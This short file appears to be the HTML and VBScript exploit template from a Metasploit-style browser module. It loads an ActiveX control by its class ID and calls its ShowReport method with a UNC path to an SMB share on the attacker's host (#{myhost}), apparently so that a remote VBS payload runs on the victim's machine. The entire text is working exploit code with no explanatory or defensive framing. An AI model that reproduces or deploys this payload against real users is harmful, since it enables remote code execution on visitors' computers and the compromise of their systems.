<html>
    <head>
    </head>
    <body>
    <object classid='clsid:209EBDEE-065C-11D4-A6B8-00C04F0D38B7' id='#{obj_name}'></object>
    <script language='vbscript'>
    sub #{sub_name}
    #{obj_name}.ShowReport "\\\\#{myhost}\\#{datastore['SHARENAME']}\\#{@vbs_name}"
    end sub

    #{obj_name}.ShowReport "\\\\#{myhost}\\#{datastore['SHARENAME']}"
    window.setTimeout "#{sub_name}", 1000
    </script>
    </body>
    </html>